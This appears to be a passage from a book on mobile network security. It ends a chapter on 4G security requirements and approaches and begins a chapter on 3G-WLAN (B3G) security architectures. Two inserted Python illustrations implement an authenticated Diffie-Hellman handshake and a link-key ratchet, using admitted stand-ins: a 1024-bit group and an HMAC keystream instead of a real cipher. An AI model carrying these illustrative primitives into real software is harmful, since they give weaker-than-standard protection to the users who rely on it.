IEEE 802.11 defines a handshake procedure based on credentials existing between the network (the access point) and the user. The whole procedure (i.e., the authentication method, the exchanges, the cryptographic functions and the success conditions) is hardwired in the network interfaces. The only authenticated entity is the network interface of the user device (i.e., the access point is not authenticated). The authentication does not derive any key material. Moreover, the procedures are almost useless because of several concept errors.

As can be seen, the provided services are very different in terms of capabilities and the achieved security level. However, the purpose of this example is not to blame WLAN security. Today, other security models and methods are available for WLANs (notably 802.11i, introducing a different security model). Nevertheless, this situation exemplifies the normality of a heterogeneous 4G: the security models, the presumed trust relationships, the technical possibilities and the vulnerabilities are very different from technology to technology. The resolution of this problem must not lead per se to security problems. Thus, if the L2 authentication is to be used in the 4G scope, every technology has to fulfill a minimal common requirement set. Otherwise, higher level security has to be used and the associated higher level access controllers have to be collocated with the L2 access devices. If that cannot be guaranteed, this technology should be considered unsuitable for 4G.

From today’s perspective, the requirements on the L2 authentication are cryptographic strength, mutuality, and dynamic key material negotiation for the subsequent session protection. The key material negotiation should provide perfect forward secrecy (PFS), that is, a successful attack on the produced key material should not give any clues on the long-term secret such as the used credentials. User location privacy should be supported, that is, if possible, any user-specific identifiers should be unreadable for a third party.

Note that we do not formulate any requirements on the authentication logic (how many parties are involved and how), the used protocols, implementation, method placement, or on the used trust representation. However, authentication methods are generally hard to conceive and represent one of the most vulnerable parts of modern cryptosystems. Due to the flaws typically found in authentication methods during their lifetime, and given the number of different authentication methods in 4G, we additionally require that the authentication method be easily updateable.

Whatever the actual mechanism is, it has to correspond to the performance requirements in terms of possible vertical and horizontal mobility. Fast re-authentication (fewer RTTs) and particularly pre-authentication (over the same or a different interface) seem useful in the 4G context.
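The requirements just listed (mutual authentication, key material negotiated per session with perfect forward secrecy, and session keys that reveal nothing about the long-term credential) can be made concrete in a short exchange. The following Python is an added illustration written for this page; it is not code from the chapter nor from any 3GPP or IEEE specification. It assumes a long-term credential K shared between the user’s secure module and the home provider, as in the USIM case above, and uses K only to authenticate a fresh Diffie-Hellman exchange from which the session master key is derived. The modulus is the 1024-bit MODP group of RFC 2409 (chosen only to keep the block dependency-free; a deployment would use a larger group or ECDH); the message layout, field names and labels are my own.

```python
"""Mutual user-network authentication with per-session key material and PFS.

Added illustration for this page, not code from the chapter or from any
3GPP/IEEE specification.  A long-term credential K (assumed to be shared
between the user's secure module and the home provider, as with a USIM) is
used only to authenticate the two parties; the session master key comes from
a fresh Diffie-Hellman exchange, so it reveals nothing about K and a later
compromise of K does not expose recorded sessions.
"""
import hashlib
import hmac
import secrets

# 1024-bit MODP group (second Oakley group, RFC 2409), used only to keep the
# block dependency-free.  A deployment would use a larger group or ECDH.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF",
    16,
)
G = 2


def hkdf(ikm: bytes, salt: bytes, info: bytes, length: int = 32) -> bytes:
    """HKDF-SHA256 (RFC 5869): extract a PRK from the DH secret, then expand."""
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]


def mac(key: bytes, *parts: bytes) -> bytes:
    """HMAC-SHA256 over length-prefixed fields, so fields cannot be re-split."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    for part in parts:
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()


def dh_share():
    """Fresh ephemeral exponent and its public share g^x mod p (128 bytes)."""
    x = secrets.randbelow(P - 3) + 2
    return x, pow(G, x, P).to_bytes(128, "big")


def dh_secret(x: int, peer_share: bytes) -> bytes:
    return pow(int.from_bytes(peer_share, "big"), x, P).to_bytes(128, "big")


def derive_master(z: bytes, rand: bytes, gx: bytes, gy: bytes) -> bytes:
    """Master key from the ephemeral secret and the transcript only; K is not an input."""
    return hkdf(z, salt=rand, info=b"4g-master" + gx + gy)


def network_challenge(k_net: bytes):
    """Message 1, network -> user: nonce, ephemeral share and a MAC under K.

    The MAC lets the user authenticate the network before it sends anything.
    Returns the message and the network's private exponent (kept locally).
    """
    rand = secrets.token_bytes(16)
    y, gy = dh_share()
    return {"rand": rand, "gy": gy, "mac": mac(k_net, b"net", rand, gy)}, y


def user_response(k_usr: bytes, chal: dict):
    """Message 2, user -> network: verify the network, answer with an own share.

    Returns (message, user_master) or (None, None) if the network is an impostor.
    """
    if not hmac.compare_digest(chal["mac"], mac(k_usr, b"net", chal["rand"], chal["gy"])):
        return None, None
    x, gx = dh_share()
    resp = {"gx": gx, "mac": mac(k_usr, b"usr", chal["rand"], gx, chal["gy"])}
    return resp, derive_master(dh_secret(x, chal["gy"]), chal["rand"], gx, chal["gy"])


def network_finish(k_net: bytes, chal: dict, y: int, resp):
    """Network side of message 2: authenticate the user, then derive the same master."""
    if resp is None or not hmac.compare_digest(
        resp["mac"], mac(k_net, b"usr", chal["rand"], resp["gx"], chal["gy"])
    ):
        return None
    return derive_master(dh_secret(y, resp["gx"]), chal["rand"], resp["gx"], chal["gy"])


def run_handshake(k_usr: bytes, k_net: bytes):
    """One complete exchange; returns (user_master, network_master), None on rejection."""
    chal, y = network_challenge(k_net)
    resp, usr_master = user_response(k_usr, chal)
    return usr_master, network_finish(k_net, chal, y, resp)


if __name__ == "__main__":
    K = bytes(range(16))                         # constructed long-term credential
    a, b = run_handshake(K, K)
    print(a == b, run_handshake(K, bytes(16)))   # True (None, None)
```

The MAC under K in each direction is what makes the authentication mutual, and the user checks the network’s MAC before it reveals anything of its own. Because the master key is derived from the ephemeral secret and the transcript, a leaked master key gives no information about K, and an attacker who later obtains K cannot decrypt recorded sessions. Fast re-authentication and identity privacy are not covered here; both would need a further layer over this exchange.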


Data Encryption and Integrity Functions

Different wireless technologies use very different link encryption and data integrity techniques based on different mechanisms. Typically, shared-key mechanisms are used for both link encryption and data integrity. The actually used key is usually derived from the key material established by the authentication function.

Very often proprietary solutions are implemented both for encryption and data integrity. The needs of the used encryption and integrity mechanisms in terms of key properties (format, length, known weak keys, etc.) and the optionally used initialization vectors are very different. The provided security levels are also quite different. Thus, the situation of these functions is similar to that of the user-network authentication. If some minimum requirements cannot be fulfilled, these functions have to be replaced (e.g., in the overlay) or the technology cannot be used.

Simultaneously, both functions are in use during the whole session. Thus, their power and resource consumption is particularly critical. For that reason, we think that both encryption and integrity functions should be implemented in the associated network adapter (hardwired, or in the form of hardwired cryptographic bricks connected by the soft-wired firmware definitions). Both functions must use the key material derived during the last authentication session and support rapid re-keying, both periodic and on demand. Ideally, both functions should be cryptographically strong. However, if flaws are detected, the rapid re-keying can help mitigate the problem by changing the encryption keys very often.

Provider-Provider Security

In 2G/3G, providers usually sign preliminary bilateral contracts known as roaming agreements. Such agreements build the basis for mutual user authentication, authorization, service and charging. Every provider thus sets up a special subsystem serving AAA requests from other providers, acting as peers. Such requests are as such subject to prudent access control, authorization, and extensive logging.

Principally, that mechanism can also be used in 4G. However, the differences between the providers’ size and financial weight must be accounted for. In a multi-provider environment, it cannot be reasonably assumed that all providers will still trust each other. Another point is that bilateral agreements are not a scalable approach for a big number of providers (O(n²)).

From the WiFi network experience, we know that providers instead use additional trusted entities as their official roaming contract partner. Such trusted entities are either special brokers or provider associations acting as separate legal bodies. This approach permits to reestablish trust and to minimize the number of bilateral contracts.

To ensure correct billing and charging, providers often rely on external billing services and involve third party clearing houses (e.g., financial audit institutions certifying the correctness of the bills and the processes).

Other Security Problems

The remaining security issues mainly concern the SPN, its integrity, and its internal interfaces. Network engineering techniques such as flow and traffic separation, filtering, and continuous monitoring are classically used to achieve a good security level.

This is not an easy problem to solve. However, its exact resolution highly depends on the actually responsible provider: both the security needs and the technical capabilities will change depending on the provider size. That is why, at this moment, we prefer to hide the complexity within the SPN body.

APPROACHES TO 4G SECURITY

In the previous section we defined several requirements on 4G security. 4G systems are still in an early concept phase and specific realizations do not yet exist. However, different approaches are possible to achieve the technology-spanning security mechanisms that are often required.
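The requirement stated above for the data encryption and integrity functions (keys taken from the material produced by the last authentication, and rapid periodic or on-demand re-keying so that a discovered flaw exposes as little traffic as possible) is illustrated by the following Python block. It is an added example for this page, not code from the chapter. It assumes a 32-byte master key standing in for the output of the user-network authentication (here a constructed constant), derives per-direction encryption and integrity keys from a chain key that is ratcheted forward at every re-key, and protects frames with an HMAC-based keystream plus an HMAC tag. That keystream is only a dependency-free stand-in for a real link cipher such as AES-CCM; the frame header layout, the labels, the class and function names and the `MAX_EPOCH_SKIP` bound are my own choices.

```python
"""Link protection keys derived from the authentication master key,
with rapid re-keying by a one-way ratchet.

Added example for this page (not the chapter's code).  MASTER is a
constructed stand-in for the key material produced by the user-network
authentication; the HMAC keystream is a dependency-free stand-in for a
real link cipher such as AES-CCM.
"""
import hashlib
import hmac
import struct

HDR = struct.Struct(">IQ")   # epoch (32 bit) | sequence number (64 bit)
TAG_LEN = 16                 # truncated HMAC-SHA256 tag
MAX_EPOCH_SKIP = 8           # how far ahead a peer may have re-keyed (assumption)


def kdf(key: bytes, label: bytes) -> bytes:
    """One-step labelled derivation: HMAC-SHA256(key, label)."""
    return hmac.new(key, label, hashlib.sha256).digest()


def keys_for(chain: bytes):
    """Encryption and integrity keys of the epoch whose chain key is `chain`."""
    return kdf(chain, b"enc"), kdf(chain, b"mac")


def keystream(k_enc: bytes, epoch: int, seq: int, length: int) -> bytes:
    """PRF keystream; (epoch, seq) is the IV and is never reused under one key."""
    out = bytearray()
    i = 0
    while len(out) < length:
        out += hmac.new(k_enc, HDR.pack(epoch, seq) + i.to_bytes(4, "big"),
                        hashlib.sha256).digest()
        i += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class LinkKeys:
    """Key state for one direction of one session.

    chain -> (k_enc, k_mac) for the current epoch.  rekey() ratchets the chain
    forward and overwrites the old value, so keys of an earlier epoch cannot be
    recomputed from the current state.
    """

    def __init__(self, master: bytes, direction: bytes):
        self.chain = kdf(master, b"chain:" + direction)
        self.epoch = 0
        self.k_enc, self.k_mac = keys_for(self.chain)
        self.seq = 0          # next sequence number to send
        self.last_seq = -1    # highest sequence number accepted in this epoch

    def rekey(self):
        """Periodic or on-demand re-keying: a one-way step, old keys forgotten."""
        self.chain = kdf(self.chain, b"ratchet")
        self.epoch += 1
        self.k_enc, self.k_mac = keys_for(self.chain)
        self.seq, self.last_seq = 0, -1

    def protect(self, plaintext: bytes) -> bytes:
        """Encrypt-then-MAC one frame: header | ciphertext | tag."""
        hdr = HDR.pack(self.epoch, self.seq)
        ct = xor(plaintext, keystream(self.k_enc, self.epoch, self.seq, len(plaintext)))
        tag = hmac.new(self.k_mac, hdr + ct, hashlib.sha256).digest()[:TAG_LEN]
        self.seq += 1
        return hdr + ct + tag

    def unprotect(self, frame: bytes):
        """Return the plaintext, or None if the frame is stale, replayed or forged."""
        if len(frame) < HDR.size + TAG_LEN:
            return None
        epoch, seq = HDR.unpack_from(frame)
        if epoch < self.epoch or epoch - self.epoch > MAX_EPOCH_SKIP:
            return None                      # keys already discarded, or implausible jump
        chain = self.chain                   # trial-ratchet on a copy: a forged header
        for _ in range(epoch - self.epoch):  # must not move our real state
            chain = kdf(chain, b"ratchet")
        k_enc, k_mac = keys_for(chain)
        hdr, body, tag = frame[:HDR.size], frame[HDR.size:-TAG_LEN], frame[-TAG_LEN:]
        expect = hmac.new(k_mac, hdr + body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expect):
            return None                      # integrity failure: drop before decrypting
        if epoch == self.epoch and seq <= self.last_seq:
            return None                      # replay within the current epoch
        if epoch > self.epoch:               # the peer re-keyed: commit the new epoch
            self.chain, self.epoch, self.k_enc, self.k_mac = chain, epoch, k_enc, k_mac
        self.last_seq = seq
        return xor(body, keystream(k_enc, epoch, seq, len(body)))


MASTER = bytes(range(32))   # constructed stand-in for the authentication output

if __name__ == "__main__":
    tx, rx = LinkKeys(MASTER, b"uplink"), LinkKeys(MASTER, b"uplink")
    frame = tx.protect(b"hello 4G")
    print(rx.unprotect(frame))          # b'hello 4G'
    print(rx.unprotect(frame))          # None: replayed
    tx.rekey()
    print(rx.unprotect(tx.protect(b"after re-key")), rx.epoch)   # b'after re-key' 1
```

Two details matter beyond the key derivation itself: the receiver verifies the tag before it decrypts or advances its state, so a forged header announcing a far-future epoch cannot drive the ratchet, and the (epoch, sequence) pair doubles as the never-reused IV and as the replay counter. Because the ratchet is one-way and the old chain key is overwritten, the keys of a finished epoch cannot be recomputed from the device’s current state; a compromise of the master key itself would still expose every epoch, which is why the master has to be renewed by a fresh authentication rather than by re-keying alone.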



Virtualization

Virtualization is an important means of integrating flexibility in the system design. Virtualization specifies what is to be done but not how it should be done. In other words, different behaviors accessible through, and corresponding to, the same specified interface can be used (sometimes interchangeably) during the system runtime. The instantiation can happen by pre-configuration, through soft- and firmware updates, or even dynamically, on request.

Examples for virtualization include the GSM and UMTS security (GSM 11.11, n.d.; 3rd Generation Partnership Project [3GPP] TS 33.102, n.d.) but also, for example, EAP in IEEE 802.1X (2001) and 802.11i (IEEE Draft, n.d.). The approaches to the virtualization are very different.

2G/3G security relies upon smart cards that represent the network counterparts for authentication and per-packet encryption. The actual algorithms and methods are hidden and implemented within the closed card; they are always run against the home provider, who also acts as smart card issuer. In that manner, every home provider has a free choice of standard or better mechanisms to fulfill his/her particular security requirements. The whole transport and signaling infrastructure, including the visited network provider, is independent of that implementation. It is thus feasible to enforce different authentication and per-packet security on a per-user basis.

The usage of the 802.1X/EAP protocol in 802.11i for access control provides a generic authentication function: by specifying how to control, transport, and evaluate user authentication frames instead of specifying how to authenticate users, this standard is now open to authentication method choices. The deployed infrastructure is freed from any authentication logic; only the central authentication server has to implement the actual mechanism, such as, for example, EAP-TLS, specifying TLS (Dierks & Allen, 1999) transport over EAP. That enables an authentication method choice on a per-session, per-user basis.

Virtualization is thus a strong design principle for open systems. It thus seems very interesting for 4G security. Nevertheless, even with virtualization, requirements on all mechanisms need to be thoroughly specified.

Adaptation

Adaptation refers to dynamic changes within the implementations of the communicating parties. This could concern the user terminal security measures and the provided network and service environment.

Adaptation could rely on different profiling mechanisms, including machine learning. However, in the telecommunications context, it could also involve more pragmatic signaling-based adaptation. Given the current network situation, the used access network technology and an extensive user-network signaling capable of expressing user needs, the network could actually create a (virtual) SPN corresponding exactly to the users’ expectations in the chosen access network technology. Different virtualization techniques can be used in that scope, from the previous security virtualization examples to infrastructure virtualization techniques such as VLAN (IEEE 802.1q) or MPLS (Rosen, Viswanathan, & Callon, 2001). This approach could ultimately provide users with their own virtual environments, inaccessible by others, and, at the same time, render the actual physical SPN and its management subsystems inaccessible by the users. Hence, this approach could come in handy to solve parts of the problem with the heterogeneity of the ANs.

On the terminal, adaptation can help bridge the differences in the available implementations of the access network security. By inspecting the available (active) interfaces and the really activated measures, and taking into account the available information on recently discovered low level vulnerabilities (user input, secure home network signaling channel, etc.), the terminal implementations could preprocess the sent data, so that it still fulfills the overall security policy in spite of the insufficiencies.

Standardization

Since 4G does not yet exist, standardization could be used at these early stages to build a good



base for future 4G security. Basically, such standardization efforts should apply to new technologies and adapt the existing ones, so these could be used in the future 4G landscape.

In 4G, standardization is one of the central discussions. Not everything can be standard, since otherwise we migrate back from the technology-opportunistic vision to a monolithic one-technology vision. On the other hand, without any standards, hardly any communication is possible. The compromise between what we standardize in the 4G scope and what we leave to the respective technology is the most critical design decision.

The standardization should respect the three introduced interfaces, differentiating user-network, provider-provider, and internal SPN interfaces (mainly management plane).

Virtualization plays an important role for 4G standardization. We can learn from the former experiences that specifying what and how separately is more flexible. To provide adaptation, we need at least a common signaling standard. This represents a seemingly viable alternative approach to the current pure overlay solutions such as All-IP. We could standardize a common 4G signaling protocol, including virtual definitions for the network access and data protection phases, and then use the access technologies as is, without any additional changes, as a pure data transport.

CONCLUSION

The 4G reflections started about 2001 are not yet mature enough to present a sound overview of 4G security. At the current state, there is no common 4G vision and what will eventually be called 4G is an open question.

Independent of that, we believe that a technology-opportunistic system such as the one presented in this chapter will eventually be built. That is the reason why the new security problems related to the high system heterogeneity and the new usage scenarios, as presented in this chapter, seem to be of major importance for the understanding of the vulnerabilities and the design of future telecom systems.

More specifically, in this chapter, we present the definitions and the development process from 1G to 4G, discussing telecommunications landscape changes and time scales. We then introduce the current state of the 4G discussion and present our vision of 4G as a technology-opportunistic, user-centric mobile services system built of multi-interface terminals and heterogeneous ANs, bound by a decent management subsystem. Given that 4G shape, and conforming to the main trend in the current 4G research, we introduce the main system interfaces, its links and entities, to discuss its vulnerabilities.

We then introduce the 4G security requirements, justifying the special character of, and insisting on, the network access phase. Finally, we propose several high level approaches to 4G security, including virtualization, adaptation and standardization.

REFERENCES

3rd Generation Partnership Project (3GPP) TS 33.102 Release 99. (n.d.). 3GPP: Technical specification group (TSG), 3G security: Security architecture. Sophia Antipolis Cedex, France: Author.

Al-Muhtadi, I., Mickunas, D., & Campbell, R. (2002, April). A lightweight reconfigurable security mechanism for 3G/4G mobile devices. IEEE Wireless Communications, 9(2), 60-65.

Bahl, P., Balachandran, A., & Venkatachary, S. (2001, June). Secure wireless Internet access in public places. In Proceedings of the IEEE International Conference on Communications (IEEE ICC 2001), Finland.

Becchetti, L., Priscoli, F. D., Inzerilli, T., Mähönen, P., & Muñoz, L. (2001, August). Enhancing IP service provision over heterogeneous wireless networks: A path towards 4G. IEEE Communications Magazine, 39(8), 74-81.

Blake, S., Black, D., Carlson, M., Davies, E., Wang, Z., & Weiss, W. (1998, June). An architecture for differentiated services (RFC 2475). Retrieved from http://www.ietf.org/rfc/rfc2475.txt



Braden, R., Clark, D., & Shenker, S. (1994, June). Integrated services in the Internet architecture: An overview (RFC 1633). Retrieved from http://tools.ietf.org/html/rfc1633

Bria, A., Gessler, F., Queseth, O., Stridh, R., Unbehaun, M., & Wu, J. (2001, December). 4th-generation wireless infrastructures: Scenarios and research challenges. IEEE Personal Communications, 8(6), 25-31.

Case, J. D., Fedor, M., Schoffstall, M. L., & Davin, J. (1990, May). Simple network management protocol (SNMP) (RFC 1157). Retrieved from http://www.ietf.org/rfc/rfc1157.txt

Code Division Multiple Access (CDMA) Development Group. (n.d.). Technology: 3G—cdma2000. Retrieved from http://www.cdg.org/technology/3g.asp

Dell’Uomo, L., & Scarrone, E. (2001, September). The mobility management and authentication/authorization mechanisms in mobile networks beyond 3G. IEEE Personal, Indoor and Mobile Radio Communications, 1, C44-C48.

Dierks, T., & Allen, C. (1999, June). The TLS protocol version 1.0 (RFC 2246). Retrieved from http://www.ietf.org/rfc/rfc2246.txt

Durham, D. (Ed.), Boyle, J., Cohen, R., Herzog, S., Rajan, R., & Sastry, A. (2000, January). The COPS (common open policy service) protocol (RFC 2748). Retrieved from http://www.rfc-editor.org/rfc/rfc2748.txt

Emmerich, W. (2000, June). Engineering distributed objects. John Wiley & Sons.

Evans, B. G., & Baughan, K. (2000, December). 4G visions. IEEE Electronics & Communications Engineering Journal, 12(6), 293-303.

Forsberg, D., Ohba, Y., Patil, B., Tschofenig, H., & Yegin, A. (2003, March). Protocol for carrying authentication for network access. IETF PANA Working Group Draft, work in progress. Internet Engineering Task Force.

Friday, A., Wu, M., Schmid, S., Finney, J., Cheverst, K., & Davies, N. (2001, July). A wireless public access infrastructure for supporting mobile context-aware IPv6 applications. In Proceedings of the ACM 1st Workshop on Wireless Mobile Internet, Rome, Italy (pp. 11-18).

Ginzboorg, P. (2000, November). Seven comments on charging and billing. Communications of the ACM, 43(11), 89-92.

Global System for Mobile Communications (GSM) 11.11 (n.d.). Digital cellular telecommunication system (Phase 2+); Specification of the subscriber identity module—Mobile equipment (SIM-ME) interface. Author.

Global System for Mobile Communications (GSM) Association. (n.d.). 3GSM platform. Retrieved from http://www.gsmworld.com/technology/3g/index.shtml

Gupta, V., & Gupta, S. (2002, March). KSSL: Experiments in wireless Internet security. In Proceedings of the Wireless Communications and Networking Conference (pp. 860-864).

Hecker, A. (2005, March 16). On logical network access control and the associated user and network management in future heterogeneous 4G wireless systems. Computer Science and Networking Department, Ecole Nationale Supérieure des Télécommunications (ENST), Paris, France.

Hecker, A., & Labiod, H. (2004). Pre-authenticated signaling in wireless LANs using 802.1X access control. In Proceedings of the IEEE GLOBECOM 2004, Dallas, TX.

IEEE Draft 802.11e. (2003, February). Draft supplement to standard for telecommunications and information exchange between systems—LAN/MAN specific requirements—Part 11: Wireless medium access control (MAC) and physical layer (PHY) specifications: Medium access control (MAC) enhancements for quality of service (QoS). Author.

IEEE Draft 802.11i. (n.d.). Draft supplement to IEEE Std. 802.11, Part 11: Specifications for enhanced security. Author.

IEEE Standard 802.11F. (2003, July). Trial-use recommended practice for multi-vendor access



point interoperability via an inter-access point protocol across distribution systems supporting IEEE 802.11 operation. Author.

IEEE Standard 802.1X. (2001, June). Port-based network access control. Author.

International Telecommunication Union-Radio Communication Sector (ITU-R) World Radiocommunication Conference. Retrieved from http://www.itu.int/ITU-R/index.asp?category=conferences&link=wrc&lang=en

Kellerer, W., Vögel, H.-J., & Steinberg, K.-E. (2002, March). A communication gateway for infrastructure-independent 4G wireless access. IEEE Communications Magazine, 40(3), 126-131.

Kent, S., & Atkinson, R. (1998, November). Security architecture for the Internet protocol (RFC 2401). Retrieved from http://www.ietf.org/rfc/rfc2401.txt

Misra, A., Das, S., Dutta, A., McAuley, A., & Das, S. K. (2002, March). IDMP-based fast handoffs and paging in IP-based 4G mobile networks. IEEE Communications Magazine, 40(3), 138-145.

Nakhjiri, M., Perkins, C., & Koodli, R. (2004, August). Context transfer protocol. In J. Loughney (Ed.), Approved IETF draft, work in progress. Internet Engineering Task Force.

Otsu, T., Okajima, I., Umeda, N., & Yamao, Y. (2001, October). Network architecture for mobile communications systems beyond IMT-2000. IEEE Personal Communications Magazine, 8(5), 31-37.

Peirce, M. (2000, October). Multi-party electronic payments for mobile communications. Unpublished PhD thesis, Department of Computer Science, University of Dublin, Trinity College.

Pereira, J. M. (2000, September). Fourth generation: Now, it is personal! In Proceedings of the IEEE International Symposium on Personal, Indoor and Mobile Radio Communications (PIMRC), London (Vol. 2, pp. 1009-1016).

Raivio, Y. (2001, March). 4G—Hype or reality (Conference Publication No. 477). In IEE 3G Mobile Communication Technologies (pp. 346-350).

Raychaudhuri, D. (2002, September). 4G network architectures: WLAN hot-spots, infostations and beyond... In IEEE PIMRC 2002 Keynote Talk, Lisbon, Portugal.

Rosen, E., Viswanathan, A., & Callon, R. (2001, January). Multiprotocol label switching architecture (RFC 3031). Retrieved from http://tools.ietf.org/html/rfc3031

Schulzrinne, H., & Wedlund, E. (2000, July). Application-layer mobility using SIP. ACM Mobile Computing and Communications Review, 4(3), 47-57.

Tsao, S.-L., & Lin, C.-C. (2002, September). Design and evaluation of UMTS-WLAN interworking strategies. In Proceedings of the IEEE 56th Vehicular Technology Conference (VTC), Vancouver, Canada.

Van Damme, E. (2002, May 4-5). The European UMTS-auctions. European Economic Review, 46, 846-858.

Varshney, U., & Jain, R. (2001, June). Issues in emerging 4G wireless networks. IEEE Computer, 34(6), 94-96.

Yahalom, R., Klein, B., & Beth, Th. (1993, May). Trust relationships in secure systems—A distributed authentication perspective. In Proceedings of the IEEE ComSoc Symposium on Research in Security and Privacy, Oakland, CA (pp. 150-164).

Yumiba, H., Imai, K., & Yabusaki, M. (2001, October). IP-based IMT network platform. IEEE Personal Communications Magazine, 8(5), 18-23.

Zhang, T., Agrawal, P., & Chen, J.-C. (2001, October). IP-based base stations and soft handoff in all-IP wireless networks. IEEE Personal Communications Magazine, 8(5), 24-30.

Zhang, J., Li, J., Weinstein, S., & Tu, N. (2002, July). Virtual operator based AAA in wireless LAN hot spots with ad-hoc networking support. ACM Mobile Computing and Communications Review, 6(3), 10-21.



ENDNOTES

1. Since users are the main focus of our work, we prefer this term to the synonymic operator, which refers to the infrastructure.

2. This is not limiting since any legal body can have multiple user assignments.

3. This is used consistently with the original definition given in Zhang et al. (2002). However, since in this special case no infrastructure exists, the actually “operated” entity is the user. This term is thus also consistent with our strictly user-oriented view.

4. That underlines the fact that our model mainly requires the service contract as a means for a reliable user identification. Indeed, without any pre-established trust, no reliable billing is possible.

5. International Mobile Telecommunications 2000, ITU’s common name for different 3G variants.

6. Note that generally these two problems are not equivalent. However, in our 4G vision we suppose that SPNs are organized as integrated transport and services networks run by the same authority. In that view, the difference between the two is of a very technical nature; it is merely limited to and by the internal SPN organization.

7. Although the lower layer address and the user identity are two completely different identifiers, one initial passive network observation in the proximity of a victim allows the establishment of a direct relationship.




Chapter XIX
Security Architectures for B3G Mobile Networks
Christoforos Ntantogian
University of Athens, Greece

Christos Xenakis
University of Piraeus, Greece

ABSTRACT

The integration of heterogeneous mobile/wireless networks using an IP-based core network materializes the beyond third generation (B3G) mobile networks. Along with a variety of new perspectives, the new network model raises new security concerns, mainly because of the complexity of the deployed architecture and the heterogeneity of the employed technologies. In this chapter, we examine and analyze the security architectures and the related security protocols which are employed in B3G networks, focusing on their functionality and the supported security services. The objectives of these protocols are to protect the involved parties and the data exchanged among them. To achieve these, they employ mechanisms that provide mutual authentication as well as ensure the confidentiality and integrity of the data transferred over the wireless interface and specific parts of the core network. Finally, based on the security mechanisms, we present a comparison of them that aims at highlighting the deployment advantages of each one and classifies the latter in terms of: (1) security, (2) mobility, and (3) reliability.

INTRODUCTION

The evolution and successful deployment of wireless LANs (WLANs) worldwide has yielded a demand to integrate them with third generation (3G) mobile networks. The key goal of this integration is to develop heterogeneous mobile data networks, named beyond 3G (B3G) networks, capable of supporting ubiquitous computing. Currently, the network architecture (3rd Generation Partnership Project [3GPP] TS 23.234, 2006) that integrates 3G and WLAN specifies two different access scenarios: (1) the WLAN Direct IP Access and (2) the WLAN 3GPP IP Access. The first scenario provides to a user an IP connection to the public Internet or to an intranet via the WLAN access network

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security Architectures for B3G Mobile Networks

(WLAN-AN), while the second allows a user to connect to packet switched (PS) based services (such as wireless application protocol [WAP], mobile multimedia services [MMS], location-based services [LBS], etc.) or to the public Internet, through the 3G public land mobile network (PLMN).

Along with a variety of new perspectives, the new network model (3G-WLAN) raises new security concerns, mainly because of the complexity of the deployed architecture and the heterogeneity of the employed technologies. In addition, new security vulnerabilities are emerging, which might be exploited by adversaries to perform malicious actions that result in fraud attacks, inappropriate resource management, and loss of revenue. Thus, the proper design and a comprehensive evaluation of the security mechanisms used in the 3G-WLAN network architecture is of vital importance for the effective integration of the different technologies in a secure manner.

In this chapter we examine and analyze the security architectures and the related security protocols, which are employed in B3G, focusing on their functionality and the supported security services for both the WLAN Direct IP Access and the 3GPP IP Access scenarios. Each access scenario (i.e., WLAN Direct Access and WLAN 3GPP IP Access) in B3G networks incorporates a specific security architecture, which aims at protecting the involved parties (i.e., the mobile users, the WLAN, and the 3G network) and the data exchanged among them. We elaborate on the various security protocols of the B3G security architectures that provide mutual authentication (i.e., user and network authentication) as well as confidentiality and integrity services to the data transferred over the air interface of the deployed WLANs and specific parts of the core network. Finally, based on the analysis of the two access scenarios and the security architecture that each one employs, we present a comparison of them. This comparison aims at highlighting the deployment advantages of each scenario and classifying them in terms of: (1) security, (2) mobility, and (3) reliability.

The rest of this chapter is organized as follows. The next section outlines the B3G network architectures and presents the WLAN Direct IP Access and the 3GPP IP Access scenarios. The third section elaborates on the B3G security architectures, analyzing the related security protocols for each scenario. The fourth section compares the security architectures and, consequently, the two access scenarios. Finally, the fifth section contains the conclusions.

BACKGROUND

The B3G Network Architecture

As shown in Figure 1, the B3G network architecture includes three individual networks: (I) the WLAN-AN, (II) the visited 3G PLMN, and (III) the home 3G PLMN. Note that Figure 1 illustrates the architecture for a general case where the WLAN is not directly connected to the user’s home 3G PLMN. The WLAN-AN includes the wireless access points (APs), the network access servers (NAS), the authentication, authorization, accounting (AAA) proxy (Laat, Gross, Gommans, Vollbrecht, & Spence, 2000), and the WLAN access gateway (WLAN-AG). The wireless APs provide connectivity to mobile users and act like AAA clients, which communicate with an AAA proxy via the Diameter (Calhoun, Loughney, Guttman, Zorn, & Arkko, 2003) or the Radius (Rigney, Rubens, Simpson, & Willens, 1997) protocol to convey user subscription and authentication information. The AAA proxy relays AAA information between the WLAN and the home 3G PLMN. The NAS allows only legitimate users to have access to the public Internet, and finally, the WLAN-AG is a gateway to 3G PLMN networks. It is assumed that the WLAN is based on the IEEE 802.11 standard (IEEE std 802.11, 1999).

On the other hand, the visited 3G PLMN includes an AAA proxy that forwards AAA information to the AAA server (located in the home 3G PLMN), and a wireless access gateway (WAG), which is a data gateway that routes users’ data to the home 3G PLMN. The home 3G PLMN includes the AAA server, the packet data gateway (PDG) and the core network elements



of the universal mobile telecommunications system (UMTS), such as the home subscriber service (HSS) or the home location register (HLR), the Gateway GPRS support node (GGSN) and the Serving GPRS support node (SGSN). The AAA server retrieves authentication information from the HSS/HLR and validates authentication credentials provided by users. The PDG routes user data traffic between a user and an external packet data network, which is selected based on the 3G PS services requested by the user. The latter identifies these services by means of a WLAN access point name (W-APN), which represents a reference point to the external IP network that supports the PS services to be accessed by the user.

